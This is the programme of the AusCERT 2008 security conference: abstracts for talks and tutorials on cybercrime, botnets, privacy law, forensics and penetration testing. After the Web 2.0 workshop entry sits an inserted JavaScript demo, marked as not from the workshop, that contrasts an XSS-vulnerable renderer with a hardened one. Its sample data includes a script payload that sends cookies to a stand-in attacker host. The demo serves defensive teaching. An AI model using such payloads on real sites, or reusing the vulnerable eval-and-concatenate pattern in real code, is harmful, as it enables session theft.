Australia's National Computer Emergency Response Team

Presentations:

We Need Assurance!
 
Brian Snow - Former Technical Director for the Information Assurance Directorate, NSA
 
When will we be secure? Nobody knows for sure – but it cannot happen before commercial security products and services possess not only enough functionality to satisfy customers’ stated needs, but also sufficient assurance of quality, reliability, safety, and appropriateness for use. Such assurances are lacking in most of today’s commercial security products and services. I discuss paths to better assurance in Operating Systems, Applications, and Hardware through better development environments, requirements definition, systems engineering, quality certification, and legal/regulatory constraints. I also give some examples.
 

The Convention on Cybercrime - meeting a global challenge
 
Alexander Seger - Council of Europe
 

Cybercrime is the most transnational of all crimes, thus requiring a global response, including national legislation that is consistent between countries and tools for efficient international cooperation. The Convention on Cybercrime of the Council of Europe offers a framework for such a global response. The presentation provides an overview of this treaty and points out its benefits for countries of Asia and the Pacific. It will also introduce the recently adopted guidelines for cooperation between law enforcement and internet service providers in the investigation of cybercrime.

 

When Policies Collide: Security, privacy and 'ID-overload'
 
Elisabeth Wentworth - Barrister & writer - Victorian Bar
 

In the war against online crime and internet facilitated terrorism, Governments are working against time with industry, science and law enforcement to develop and implement policies and legislative responses to minimize the impact of these threats.  At the same time privacy concerns have grown and are the subject of their own legislative responses.  Are they on a collision course with security responses?  Has the work that has been done in both security and privacy been subverted by a growing trend to require high level identification as a condition of access to social activities?

This session will consider these and other questions such as:

  • How do we develop workable and sustainable policy in such an environment? Are we making some fundamental mistakes?
  • How do we design education programs that reach the ones who need to know, rather than those already in the know?
  • How can Government and industry, in particular financial institutions, meet the challenge of engendering trust in the online channel while educating consumers to be 'appropriately distrustful' of the criminals?
  • And what does Sponge Bob Square Pants have to do with any of this?

 

The ISO 27001:2005 Journey at Dubai Aluminium Company Limited
 
Ahmad Almulla - CIO, Dubai Aluminium Company
 

This presentation will talk about the need for implementing ISMS and certification of ISO 27001. The case study outlines the approach taken, results achieved, challenges faced and lessons learnt.

 

AusCERT Home Computer Users Security Survey 2008
 
Kathryn Kerr - AusCERT
 

The content of this segment of the program will be announced during the AusCERT2008 conference itself.

 

IPS for Real - Surviving active Intrusion Prevention in a mission-critical network
 
Walter Muller - NEMMCO
 
Many enterprise organisations have deployed IDS, some have purchased IPS, but few seem to have taken the courageous next step of enabling their IPS to actively block traffic considered to be malicious. NEMMCO, with its role in managing critical infrastructure in the form of the National Electricity Grid, thought long and hard about how to gain the security benefits of IPS without compromising its critical high-availability systems in the process. The proposed presentation is a case study describing the successful deployment of commercially-available IPS devices within NEMMCO. It describes the deployment process beginning from threat analysis, through product selection and phased deployment to the point where the system is currently in production use, actively blocking malicious traffic with automated updates and full monitoring in place. It describes the problems encountered and is intended to be of practical assistance for other organisations wanting to deploy IPS and survive.
 

Recent developments in the field of High tech Crime with an emphasis to phishing and case studies
 
Andre Dornbusch - BKA - German Federal Criminal Police office
 

Several points to be highlighted in this presentation include:

  • Overview of the situation in the field of high tech crime in Germany, including a sheet on how online banking works.
  • Recruitment of National Financial Agents (Transfermanagers) in Germany, highlighting how recruitment works and showing how suspects have to find new ways in order to get money abroad. This will include the topic "Financial Agent in Love".
  • Money laundering in connection to a case. The BKA learned from an investigation that there are special ways of money laundering after phishing. This is a short overview of the case and demonstration of the 'Modus Operandi' - how to launder the money that has been gained through phishing.
  • VoIP case study - a short overview concerning a case that dealt with VoIP hacking and blackmailing.

 

The future of Botnets
 
Steve Santorelli - Team Cymru
 

Botnets used to be relatively simple. Their control mechanism was based on Internet Relay Chat and there were a number of ways to dismantle the criminals' ability to control this zombie army. There were some easy ways to make money and many people got into the botherding scene but quickly found that law enforcement and their fellow botherders made life difficult.

Over the last 5 years, law enforcement around the world became more technically adept at analyzing malware, monitoring botnets and identifying these criminals. Investigators partnered with industry experts and together it looked like we were going to start to reclaim the internet from the zombies.

What actually happened was that we forced the botherders to evolve away from IRC to new forms of command and control. There was so much money to be made from spamming, phishing, DDoS attacks and harvesting of passwords that they refused to stop - they just got much smarter.

We now have a number of new types of botnet that have been designed to be much harder to track and dismantle. Some of them are so well designed that there is currently no known legal way to stop them.

These botnets are continuing to grow and make money for teams of unidentified criminals and there is no prospect of an end to the misery these new botnets cause.

This presentation will include an overview of basic botnets and highlight some of the new methods being employed by the new breed of botnets, in particular peer to peer and web based controllers with some case studies.

 

Trends in Internet based Fraud: Nigeria's EFCC Perspective
 
Ibrahim Lamorde - Acting Executive Chairman, Economic and Financial Crimes Commission (EFCC), Nigeria
 

Ibrahim Lamorde is an Assistant Commissioner of Police who works with the Economic and Financial Crimes Commission (EFCC) of Nigeria. He has been investigating and prosecuting economic and financial crimes for many years. This has given him insight into trends regarding Internet based fraud.

Mr Lamorde will also talk about his experience dealing with other government law enforcement agencies such as the FBI, Metropolitan Police, United States Postal Inspection Service (USPIS), Internet Crime Complaint Center (IC3), Dutch Police, German Police, South African Police etc.

 

Cyber Crime within the Russian Federation
 
Kimberly Zenz - iDefense
 

The Russian Federation has long been a major source of cyber criminal activity. While financially-motivated operations such as phishing, trojans, botnets and even traditional spam operations targeting international financial institutions remain common, a growing number of Russian cyber criminals are targeting victims within their own country and/or engaging in activities such as distributed denial of service attacks aimed at competitors and occasionally political or social targets. This presentation will review some of the more salient characteristics of online criminal activity within the Russian Federation as well as some of the services and support available to the practitioners.

 

Biometrics - are they ready for use in Banking and Payments?
 
Colin Whittaker - APACS
 

Biometrics in many pundits' minds are rapidly becoming the silver bullet for all authentication requirements. This is often based on some very grave and false assumptions about their capabilities for real world use, and a misunderstanding of the ease with which they can be deployed. There is also a danger, when biometrics are put forward as a solution, of failing to apply the classical security and business risk assessments to determine if and how the technology should be used. We in APACS have been monitoring biometrics technologies for a number of years in order to understand what role they could play in banking and payment systems, especially in the area of customer authentication. The aim of this presentation will be to assess the current capabilities and limitations of biometrics and assess how ready these technologies are for use in our sector, and in doing so help to provide the basis for a more reasoned and balanced debate on biometrics.

 

Government as a privacy-protective Identity Provider: the New Zealand case
 
Vikram Kumar - NZ State Services Commission
 
Abstract: The New Zealand Government is developing a service that allows people to verify their identity online to a near-passport level to government agencies. This service will protect people's privacy without unique national identifiers or a national identity card. The concepts behind the service can be extended to authoritatively verify information online that is held by government agencies about them.

Intended audience: Academia / Consulting / IT, IS Managers / Media / Marketing / Policy and Government Analysts / Research / Technical and architects / Vendors and System Integrators

Learning objectives: 1. Distinguish between identity, attributes, assertions, claims, authentication, and authorisation. 2. Demonstrate how government can be a privacy-protective Identity Provider. 3. Debate the need for unique national identifiers and national identity cards. 4. Recommend an online solution for giving information to government only once. 5. Question how user-centric identity approaches, including Windows CardSpace and OpenID, can be used in the government context.

 

The ALRC's review of privacy law and practice
 
Professor David Weisbrot - Australian Law Reform Commission
 

The Australian Law Reform Commission is in the final stages of a major review of Australian information privacy law and practice, with the main aims of reducing complexity and ensuring that the law is sufficiently robust to deal with the new (and emerging) electronic environment.  In September 2007, the ALRC released a three volume, 2000 page, Discussion Paper (DP72) containing 301 proposals for community consideration.  The major areas covered include: simplification and harmonisation of privacy laws (including unification of the two sets of privacy principles); exemptions; powers of the Privacy Commissioner; health privacy; credit reporting; children's privacy; telecommunications; cross-border data flows; data breach notification; and the creation of a statutory cause of action for serious breach of privacy.  In the inquiry, the ALRC has undertaken the largest public consultation exercise in its history, participating in about 250 meetings and receiving nearly 600 written submissions.  The final report and recommendations are due to be presented to the Attorney-General on 30 May 2008.

 

Microsoft SCPcert announcement
 
Zot O'Connor - Microsoft
 

This will be the world wide announcement of a new Microsoft program 'SCPcert' in which Microsoft will be working closely with National and Regional CERTs through its SCP and MSRA program.

 

Flow Visualization in an Operational Environment
 
Lee Rock - US-CERT
 

This presentation will review the use of various visualization technologies in use by US-CERT in viewing flow data from the Einstein program. We will quickly cover the common types of flow visualization and the challenges faced in presenting large volumes of data visually.

Finally, we will examine five applications in use by US-CERT, and the benefits and limitations of current methods for presenting flow data visually.

 

Broad lessons from the Computer Network Vulnerability Assessment program AND Cyber Storm II - an international cyber security exercise.
 
David Campbell AND Jordana Siegel & Steven Stroud
 

Broad lessons from the Computer Network Vulnerability Assessment Program:

The Computer Network Vulnerability Assessment (CNVA) Program is an Australian Government grants scheme developed to help secure critical infrastructure. It is managed by GovCERT.au, the Australian Government Computer Emergency Readiness Team, located in the Australian Government Attorney-General's Department. The program provides dollar for dollar funding to help owners and operators of critical infrastructure to identify major vulnerabilities within their ICT systems and the dependencies between their networks, and to test the ability of their systems to resist exploitation. This session will explore the broad security lessons at a high level from the CNVA projects completed so far.

----------------

Cyber Storm II - an international cyber security exercise:

In March 2008, the United States Department of Homeland Security's National Cyber Security Division (NCSD) sponsored its second large-scale national cyber exercise, Cyber Storm II. The exercise was massive, involving over 200 organisations from 5 nations spread across 9 time zones. This session will outline what was done and discuss some of the initial findings from the exercise.
 

 

Standing Behind Technical Promises
 
Alana Maurushat - University of NSW
 

The information security landscape is shifting from self-regulation and legal complacency to one of regulation and legal activism. Privacy and security are no longer seen as diametric opposites. A middle playing field of personal information security is emerging. The competing tension between protecting anonymity online and accountability for online activities has heightened. Where this tension has traditionally played out in the cyber-criminal fray, we are now seeing similar arguments spilling over into the corporate realm. On the one hand, there is a push for legal protection of anonymous transactions in online activities (see recommendations for the Review of Australian Privacy Law). On the other, new laws have been introduced in an attempt to boost accountability online, such as enhanced data retention laws: accountable conduct for users as well as accountable conduct for corporations (including ISPs, banks, software vendors, and all corporations and organizations who handle personal information). At the same time we are seeing a decline in public trust in using online services. As such, we are headed towards a significant expansion of corporate obligations concerning information security.

This presentation will provide an overview of new and future legal obligations in information security. It will examine such trends in the international and Australian framework where appropriate.

 

Geekonomics: The Real Cost of Insecure Software
 
David Rice
 

Software is becoming the foundation of civilization; yet few, if any, industries composing national infrastructures enjoy so little oversight as software production. Despite general agreement on inadequate software development practices and the enormous cost borne by individuals and organizations for protecting their systems from exploitation, the software industry enjoys remarkable insulation from liability and regulation. This is a dangerous proposition for national infrastructures. David Rice illuminates the economic impacts of poor quality software and compares regulatory standards among various industries as he challenges software purchasers to demand better quality software so that governments, faced with a popular uprising, will refuse to remain silent on the issue. Software is becoming the foundation of civilization and therefore demands the time and attention foundations deserve.

 

 

Web 2.0 INsecurity
 
Nikola Mijatovic & Benjamin Mosse - Sec Pro
 

Many service providers now offer their business through web applications. Web services have developed over the past years into a powerful and flexible platform where business meets business and customers. This has triggered a surge of new requirements, leading to some significant changes in the way we use and consume software, store data and develop applications, completely transforming the Web.

Probably the most popular Web development in recent years is AJAX. Together with other technologies, AJAX forms the foundation for Web 2.0, which has revolutionised the way we use and experience the web. Unfortunately the industry has created a new popular technology without much security in mind. Not only have new attack vectors evolved, but the attack surface for old web application attacks has also increased. Cross Site Scripting (XSS), parameter manipulation and session hijacking are just a few of them. Additionally, security professionals have to be concerned about new data containers like JSON, new architecture principles like REST, new protocols like SOAP and especially the JavaScript language.

This workshop will consist of following parts:

1. Introduction and "Why can't your firewall and IDS/IPS protect you against web application attacks?"

This part looks at the evolution of hacking from networks to web applications.   It explains why conventional security products don't offer any protection against attacks through web applications.

2. Web application vulnerabilities

This part is all about the most common web application vulnerabilities like XSS, CSRF, SQL injection, code injection and data leakage. We will look at basic as well as more advanced forms of attacks. Attacks will be analysed in detail so their cause is understood. We will also talk about tools that can be used to discover these vulnerabilities.

3. Hands on session, "Experimenting with web application vulnerabilities in an application"

First practical session where attendees get a chance to apply their knowledge gained in the previous parts. A local HACKME application will be used as target.

4. Difference between Web 1.0 and Web 2.0 (and what exactly is AJAX)

This part offers a detailed introduction to Web 2.0. It also shows the advancements from first to the second generation of Web Applications.

5. Security implications on Web 2.0

After defining Web 2.0 we will take a look at its implications from a security perspective.  Main focus will be same domain policy, its circumvention and what this means for business.  We will talk about vulnerabilities introduced by Web 2.0, their identification/discovery and some tools that might help in their remediation.

6. Hands on session, "Finding and exploiting web application vulnerabilities in a Web 2.0 application"

The second practical session can be seen as a hacking challenge on a local application which runs on Web 2.0 technology. Attendees will need to find vulnerabilities and try to exploit them.

7. Future of Web 2.0 security and wrap-up

We'll start this part with a demonstration of JavaScript worms, scanners and other interesting applications which will show the powerful future of Web 2.0. After that we'll finish off with question time.

Hope to see you there ... we'll make your investment worth while ;-)

Benjamin and Nik, Secpro
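The attack surface the workshop describes, old XSS reaching a new AJAX/JSON front end, shown as an added example in JavaScript (this is not code from the workshop or from Secpro): a constructed JSON search response is parsed and rendered two ways, the AJAX-era pattern (eval of the response text, fields concatenated straight into markup) beside a hardened version (JSON.parse, every untrusted field HTML-escaped). The search endpoint, its field names and the `evil.example` host are assumptions made for illustration.

```javascript
// Added example, not from the AusCERT workshop: XSS through an AJAX/JSON
// response, vulnerable and hardened renderers side by side.

// Constructed sample response from a hypothetical /search?q=... endpoint.
// The "query" and second "name" fields carry attacker-controlled markup.
const SAMPLE_RESPONSE = JSON.stringify({
  query: '<img src=x onerror=alert(document.cookie)>',
  results: [
    { name: 'Alice', bio: 'Likes hiking & coding' },
    { name: '</b><script>fetch("//evil.example/?c="+document.cookie)</script>', bio: '' },
  ],
});

// Vulnerable, AJAX-era pattern: eval the response text (which executes anything
// the server, or a man-in-the-middle, puts there) and concatenate fields into HTML.
function parseJsonUnsafe(text) {
  return eval('(' + text + ')');
}
function renderUnsafe(data) {
  let html = '<p>Results for <b>' + data.query + '</b></p><ul>';
  for (const r of data.results) {
    html += '<li><b>' + r.name + '</b> ' + r.bio + '</li>';
  }
  return html + '</ul>';
}

// Hardened: JSON.parse accepts data only, and every untrusted field is
// escaped for an HTML text context before it touches the markup.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}
function parseJsonSafe(text) {
  return JSON.parse(text);
}
function renderSafe(data) {
  let html = '<p>Results for <b>' + escapeHtml(data.query) + '</b></p><ul>';
  for (const r of data.results) {
    html += '<li><b>' + escapeHtml(r.name) + '</b> ' + escapeHtml(r.bio) + '</li>';
  }
  return html + '</ul>';
}

// Check: does the rendered markup contain a tag the template never emits?
// The template itself only produces <p>, <b>, <ul> and <li>.
const FOREIGN_TAG = /<\/?(script|img)\b/i;
function containsInjectedMarkup(html) {
  return FOREIGN_TAG.test(html);
}

// eval versus JSON.parse on a response that is executable code, not JSON.
const POISONED_RESPONSE =
  '(function () { globalThis.pwned = true; return { query: "x", results: [] }; })()';
function evalRunsCode(text) {
  globalThis.pwned = false;
  try { parseJsonUnsafe(text); } catch (e) { /* ignore */ }
  return globalThis.pwned === true;
}
function jsonParseRejects(text) {
  try { JSON.parse(text); return false; } catch (e) { return true; }
}

// Stand-alone run for the reader.
console.log('unsafe render injected:', containsInjectedMarkup(renderUnsafe(parseJsonUnsafe(SAMPLE_RESPONSE))));
console.log('safe render injected:  ', containsInjectedMarkup(renderSafe(parseJsonSafe(SAMPLE_RESPONSE))));
console.log('eval ran code:', evalRunsCode(POISONED_RESPONSE), ' JSON.parse rejected:', jsonParseRejects(POISONED_RESPONSE));
```

The escaping here is for an HTML text context only; a value placed inside an attribute, a URL or a script block needs the encoding for that context instead, and the two parsing paths show why eval of a response body was the wrong primitive in the first place.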

 

Using F.E.D.S. - The Forensic Examiner's Database Scalpel
 
Dave Litchfield - NGS Software
 

FEDS is a breach investigation tool designed to expedite the discovery of evidence after a compromise of a database server. This tutorial will take the class through how to set up a new case and gather and then process evidence files after a breach. Once all the processing has been performed, records of interest will be located with the effective use of filters, then collated and correlated, producing a complete time line of events.

 

Computer Forensics and Electronic Discovery: Lessons learnt from the largest and most complex investigations in Australia
 
Ajoy Ghosh - LogicaCMG
 

Synopsis: The workshop is in two parts: (i) computer forensics and (ii) electronic discovery.

Part 1: Whilst commentators have had much to say about the proper conduct of a computer forensic examination, few examiners have actually been tested in the courtroom. When it has happened, most have been unable to withstand the unrelenting attack of the well-coached barrister's cross-examination. However, the reality is that many examinations are conducted by frontline IT staff with little forensic training and their experience as an expert witness fashioned by television shows like CSI.

This part of the workshop draws on the presenter's experience coaching both prosecution and defence teams to prepare technical and investigative staff to become better witnesses and, in doing so, protect themselves and their company.

Part 2: Electronic discovery has come to be a common and exacting task performed either by legal professionals with little understanding of the organisation's IT environment or IT staff with little appreciation of the importance of their tasking. If not conducted properly the result could be, and often is, that the adversary is unwittingly given incriminating documents (i.e. the smoking guns) or, worse, the organisation is found liable for the adversary's legal costs. In extreme cases, individuals can be criminally sanctioned for hiding or destroying evidence.

Without the right preparation, electronic discovery is a costly endeavour. The presenter has worked on discoveries costing in excess of 2 million dollars and routinely costing between 200 and 500 thousand dollars. Independent studies show that properly conducted electronic discovery costs between 10% and 15% of the traditional (i.e. paper) undertaking.

By examining critical decisions made in large or complex Australian cases, the presenter will help IT decision-makers understand how they can best prepare their organisation for litigation and how they can competently undertake an electronic discovery.

Handout: Participants will be given a course manual that is some 75 pages.

Format: ½ day workshop

Other information: participants will be provided with a number of giveaways. These will be forensic software and hardware provided by vendors.

 

Enterprise Resilience through Business Continuity Planning [Business Tutorial]
 
Guy Peterson & Mr Grover - Booz Allen Hamilton
 
Business continuity planning is the process of developing advance arrangements and procedures that enable an organisation to respond to a disruptive event in such a manner that critical business processes continue with planned levels of interruption or essential change. The BCP program takes a full lifecycle approach to prevent and respond to a range of potential disruptions with defined roles and responsibilities throughout. Business continuity planning is a never-ending cyclical process. Procedures require routine testing and evaluation and the strategies for achieving business continuity need to be examined as business operations, the operating reality, and technologies change. Business continuity planning establishes an enterprise-wide risk-impact based approach to aligning assurance and continuity objectives with business objectives. This half-day workshop will discuss operational environments and the drivers which are making sound business continuity planning a necessity for Enterprise Resilience. The architecture of a business continuity plan will be discussed, and the audience will be taken through each step of the business continuity planning process working towards the development of a complete Business Continuity Plan. Steps to be examined will include: Establish Planning Roles and Responsibilities; Conduct Risk Assessment; Conduct Business Impact Analysis; Develop Continuity Strategies; Plan Testing, Training, and Exercises; and Plan Maintenance.

This half-day workshop is aimed at any individual who wishes to learn a sound methodology for developing, implementing and maintaining a Business Continuity Plan in support of a larger Business Continuity Management Program.

Anyone attending this half-day workshop can expect to gain a good understanding of a Business Continuity Management Program, and the process of developing, implementing and maintaining an effective Business Continuity Plan (BCP).

 

Microsoft Defend the Flag
 
Andreas Junestam & Scott Stender - iSEC Partners LLC
 

Defend The Flag (DTF) is a unique two day hands-on training course, delivered by experts from iSEC Partners, that turns the traditionally dry Windows security training workshop into an interactive, personal, and visceral experience for each attendee.

Day 1:

  • Learn how to secure Windows with the latest Windows hardening techniques
  • See demonstrations of network attacks and attack tools
  • Learn about the attackers' mindset

Day 2:

  • Students form teams to compete against each other, with each team comprising attackers and defenders
  • Defenders are responsible for keeping critical Windows servers and desktops up and running on a simulated corporate network
  • Attackers attempt to penetrate other teams' systems and shut off critical services, steal passwords and data, and generally disrupt network communications
  • The winning team is the one that has the highest scores for their ability to keep their services available throughout the day. The winners will also receive a prize!

Why attend?

Learn how to secure and defend your Windows infrastructure from the latest threats and attacks.

Who should attend?

Security Response Engineers, Security Professionals or IT Professionals with a strong security interest.

 

"Hands On" Wireless Service Auditing with Open Source tools
 
Neal Wise - Assurance.com.au
 

This tutorial will equip attendees with an understanding of conventional wireless technologies (802.11a/b/g/n, Bluetooth), their current risks and how to defend and provision secure wireless services. Attendees will be given familiarity with common wireless security tools and the opportunity to actively and passively attack and defend real wireless networks. Attendees will also learn about wireless solution control design.

 

Building a Walled Garden - Abuse and Incident Handling Tooling for Network Managers
 
Scott McIntyre - XS4ALL
 

The tooling involved with active incident handling and abuse mitigation requires tools and procedures not just to detect problems within your network, but to act on them and wherever possible remove the threat whilst at the same time providing customer awareness and enhanced security.  This tutorial will cover the bespoke tools one ISP has built and deployed which detect problems, notify customers of issues, track incident status within the organisation, and place customers in a Walled Garden until their systems are clean.

The tools discussed were all built on open-source software, and the approaches covered can apply to a variety of organisations, not just Internet Service Providers.

The tutorial will include live demonstrations of the technology discussed, a simulation of the steps required to build a Walled Garden, and plenty of opportunity for interaction and discussion on the necessity of this tooling and the policy issues that go along with building and supporting them.

 


Pure hacking: The Tutorial
 
Chris Gatford & Ty Miller - Pure Hacking
 

Pure Hacking: The Tutorial is a highlights package from existing course offerings that provide intensive, hands-on training. Participants will learn how hackers think and act. They learn how hackers can methodically gain entry into an organisation's information systems to steal information. The intent of this course is to assist organisations in arming front line staff with the approach, the latest tools and the techniques that attackers utilise so that they can better secure their organisation's IT environment.

Pure Hacking believe they are in a very good position to provide the tutorial as day in day out they are discovering the latest attack techniques to utilise in penetration testing for our client base during the work we perform for them.

-Why attend this tutorial?

To gain an understanding of an approach to performing penetration testing

As tools and techniques to attack infrastructure are becoming easier to use and more widely available allowing less sophisticated attackers to compromise complex environments.

To obtain knowledge and training to assist in defending your organisation against attack.

To learn and understand this constant threat to business.

-Who should attend?

System Administrators, Information Security Specialists, Security Administrators and Analysts, Security Testers, Internal Auditors

-What will they learn?

A high-level understanding of a methodology for penetration testing

A hands on approach for effective penetration testing

Controls and countermeasures

Leading practices in testing approaches for various technology types

Assistance in thinking outside the box.

The tutorial will include modules covering the essentials of penetration testing and the various technologies commonly utilised in most organisations.

This tutorial will provide a brief overview of:

Which tools to use

How to use the tools, and most importantly

The methodology behind security testing.

The tutorial will allow a student to understand the knowledge required for a person to be considered a capable, resourceful, and self-sufficient security tester.

Course Outline

The course is composed of the following modules and concludes with a two-hour lab simulating an organisation to compromise.

  • Module 1: Understanding security testing
  • Module 2: The Methodology
  • Module 3: Developing an attack server in Linux & Windows
  • Module 4: Windows Penetration Testing
  • Module 5: Unix Penetration Testing
  • Module 6: Miscellaneous Technologies (VOIP, Wireless, Network Protocols etc.)

LAB: The course will then have a two-hour lab simulating the above technologies, allowing students to test the skills they learnt in the morning to compromise some of the technologies and tools demonstrated during the course of the day.

 

Defence against the dark arts; repelling the wily hacker
 
Bill Cheswick
 

In this tutorial we will examine the issues of securing a small site of Unix-style computers in a hostile environment.

We will nail down freshly-installed unix systems, try jailing some important server and client applications, and discuss software safety and resistance against outside attacks. We will secure and then probe actual systems with a few common hacking tools, and discuss the ideas behind securing a community of systems with strong host security, firewalls, routing tricks, and similar tools.

System and network administrators with some experience administering Unix systems will gain understanding and confidence at designing sites that are highly-resistant to network attacks.

 

Vulnerabilities, Exposures, Attacks and the Enterprise [Business Tutorial]
 
Bob Martin and Steve Christey - MITRE
 

Not all of the newest, coolest security issues involve Web 2.0. In 2007 alone, approximately 7000 vulnerabilities were publicly reported in the Common Vulnerabilities and Exposures (CVE) list. Due to the volume of raw data, interesting discoveries can be lost in the noise, especially if they aren't published by well-known researchers for software with large installation bases. These problems might fly under the radar today, but they could become the research fad of tomorrow.

This talk will start with up-to-the-minute vulnerability classes and attacks that have yet to be well documented. It will briefly cover common analytical errors and terminology issues that prevent a deeper appreciation of the weaknesses that lead to security problems. It will introduce the basic tenets of vulnerability theory, which is a framework for understanding and reasoning about vulnerabilities, including a vocabulary for discussing important security concepts. Vulnerability theory can be used to anticipate new security issues, instead of waiting and hoping that we'll notice them the next time we dare to drink from the Internet fire hose.

As the threat of attacks against organizations broadens from the networks and commercial software to include individual software applications and infrastructure of all types, there is an increasing need for assurance that the software products acquired or developed are free of known types of security weaknesses and resistant to known attacks. To accelerate closing the gap on vulnerabilities and foster assurance that software has been tested for known security issues, the Common Weakness Enumeration (CWE) - a dictionary/encyclopedia - is being developed that can be used to look for weaknesses in code, design, or architecture, guide the development of secure software, and teach and train software developers about the code, design, or architecture weaknesses that they should avoid.

This talk will also cover the Common Attack Pattern Enumeration and Classification (CAPEC), which is developing a collection of common attack patterns to support security requirements definition, threat modeling, attack resistance through architectural risk analysis and secure code review, and targeted risk-based security testing of software, as well as teaching software developers to understand and leverage the attacker's perspective. Combined, the CWE and CAPEC efforts support the effective and efficient creation of secure software testing target lists.

Together CVE, CWE, and CAPEC provide the enterprise with tools, techniques and methods for planning, measuring, and managing their software assets and processes in a more scalable and consistent manner that is agnostic to their specific vendor technologies and suppliers, which opens the door to consistency and leverage across industries and throughout the various portions of an enterprise.

 

Enabling End-to-End Trust
 
Scott Charney - Corporate Vice President, Trustworthy Computing, Microsoft
 
The growing trend toward malicious attacks on the computer systems used by consumers, businesses and governments clearly demonstrates the need for a more comprehensive and effective approach to security and privacy. Scott Charney, VP Trustworthy Computing - Microsoft Corporation, will describe a new approach that introduces widespread strong authentication and accountability across the environment as a means of making the Internet a safer place to work, play, communicate, and conduct business while preserving individual privacy. In this presentation, Scott will summarize his ideas and the reasons behind them, and seek the community's feedback.
 

Cisco Strategic Security Approach
 
John Stewart - CSO, CISCO
 
Threats to the enterprise have trended away from simply assaulting vulnerabilities in the perimeter to more pervasive attacks that cause damage, disruption to the business, and significant financial loss. Attackers are no longer hobbyists making a name for themselves, but well-sponsored and resourced professionals seeking monetary profit. As the threat landscape continues to evolve and mature, there is a greater need for enterprise security professionals to take a more holistic approach to security. The day when we could simply apply technology to the problem is long gone. Today, we need a strategic security approach that includes people, process and technology to provide the most robust and resilient security posture. John Stewart discusses the essential practices of enterprise security, shares lessons learned, and provides his perspective on the value of developing an embedded security practice in your organization.
 

Implementing Multi-factor Authentication for Internet Banking - or Why 2FA is only two small steps in the right direction
 
David Leach - Standard Chartered Bank
 

David will review some of the key experiences and lessons from implementing 2FA in a banking context. He will hopefully answer the question whether 2FA actually does improve security. He will also use that experience to highlight the bigger context of the many changes in approach necessary to properly secure the highly networked business world. He will suggest some fundamental changes in thinking about security models that will help lay the path for many more steps in the right direction.

 

Whose Device is it anyway?
 
Paul Dorey - CSO, BP
 

Companies still believe that they own the end to end digital environment used by their staff.  So they block instant messenger, Facebook and other digital "evils" and restrict the devices used to access the corporate network. But will security policies set by an executive generation only just proud of their email and mouse skills really be sustainable?  Let's face the real world of the digital future and build a security sustainable future of the personal digital environment.  I am prepared to discuss how... are you prepared to join my session?

 

Rethinking Passwords
 
Bill Cheswick
 
Passwords and PINs are used everywhere these days. The engineers who design our security systems have four decades of advice on the deployment and use of passwords. A lot of this advice is appropriate only for outdated threat models. Many new proposals are interesting, but seem unlikely to be successful in the real world.

I will attempt to update this advice with the hope that if things don't become more secure, at least they may become easier to use.

 

Streetwise Leadership
 
Rob Redenbach - Independent security consultant
 
Streetwise Leadership blends hard facts and personal experience (plus a healthy measure of good humour) to cut to the bone of what it takes to be a better leader.

Drawing from a diverse range of extreme experiences in Asia, Africa and the Middle East, Rob provides pragmatic insights into what it takes to influence the outcome of any situation involving people.

Offering a refreshingly independent view of effective leadership, Rob's strategies equip delegates with practical tools needed to bridge the gap between mere authority and genuine leadership.

 

Privacy, the Law and Information Security
 
Adam Spencer (Chair), Seamus Byrne, Alana Maurushat, David Rice, Colin Whittaker, Brian Snow, Graham Ingram, Dan Klein, Peter Gutmann, Ajoy Ghosh, Vikram Kumar
 

This panel session will take the form of a series of short debates (around 7 minutes each) with differing teams of 3 panellists per side for each topic. The topics selected will cover a broad range of subjects under the banner of 'Privacy, the Law and Information Security'.

 

Security Challenges in Grid Environments
 
James Barlow - NCSA Senior Security Engineer
 

Security within an organization can often be a challenging task. There are usually multiple levels within an organization, as well as multiple departments that you may have to work with when responding to a security incident. What are the challenges in a grid environment where you may have thousands of users using resources within your organization that you have no control over? Then when an incident does happen (that's not an "if"), how do the organizations within the grid work together to respond to the incident, which can usually have spillover to many sites within the grid? This work addresses the challenges of security measures in the more complex environment of grid computing where there is a distributed user base and multiple physical entities composing a virtual organization. We will cover how the TeraGrid sites deal with coordinated security measures and give some real world examples on actual incidents.

 

Security Lessons Learned from setting-up a Grid-CERT
 
Klaus Moller - DFN-CERT
 

Grid Computing has often been heralded as the next logical step after the World Wide Web.  Although it is often compared to the World Wide Web, it is vastly more complex both in organisational and technical areas.  It has been argued "that CSIRT activities [i.e. security and incident response] for a Grid are not fundamentally different from those performed by a traditional CSIRT." In practice, there are many challenges to be overcome to establish a CSIRT for the specific needs of Grids and Grid users.

In the organisational field, CSIRTs have to learn that while Grid communities are technically already part of a team's constituency, several problems regarding security requirements, organisational structures and terminology have to be overcome to efficiently communicate and cooperate. To handle the technical part of Grid incidents as well as to be able to proactively help sites in securing their Grid infrastructure, a CSIRT has to develop not only an understanding of the Grid middleware used in the Grids of their constituency. Additionally, Grid systems and structures are built and operated on top of, as well as shared with, traditional systems and software in a computing center. Understanding the issues arising from this interaction is also vital to providing efficient incident response and security services. With this understanding, more advanced services like Grid honeypots or specific intrusion detection signatures for Grids may be built in the future.

 

How least privilege models, like UAC and su, will not defeat malware
 
Roger A. Grimes - Microsoft
 

Least privilege models inconvenience users and developers while not diminishing malicious hacking and malware over the long term, when we should be doing the exact opposite. Least privilege models have their uses, but minimizing malicious hacking isn't one of them. Attend and learn more about Vista's UAC, discuss the specific challenges to today's least-privilege models, and learn exactly where hackers can hide their malware in user mode models.

 

The Operational Methodology and Process of Malware Collection and Analysis
 
Richard Perlotto - Shadow Server
 

Established in 2004, The Shadowserver Foundation gathers intelligence on the darker side of the internet. We are comprised of volunteer security professionals from around the world. Our mission is to understand and help put a stop to high stakes cybercrime in the information age. This presentation will be a summary of how Shadowserver gathers in the different data that it has and what it does with that data. For more information on the Shadowserver Foundation, please see URL: http://www.shadowserver.org/wiki/

 

Evolution of Kernel-Mode Malware
 
Kimmo Kasslin - F-Secure
 

A few years ago kernel malware were simple pieces of code whose purpose was to perform a specific task on behalf of the main malware component. They were most often used as rootkits to hide files, registry entries and network connections belonging to the main payload. They were not packed or obfuscated and their analysis was easy if the analyst was familiar with kernel-mode code and tools. Since then things have changed. Full-Kernel malware have now entered the scene and this presentation will go through some of the most important developments that have had a big impact on the evolution of kernel malware.

 

Beyond bot-herders: Protecting against targeted attacks
 
Paul Chamberlain - Australian Defence Signals Directorate
 
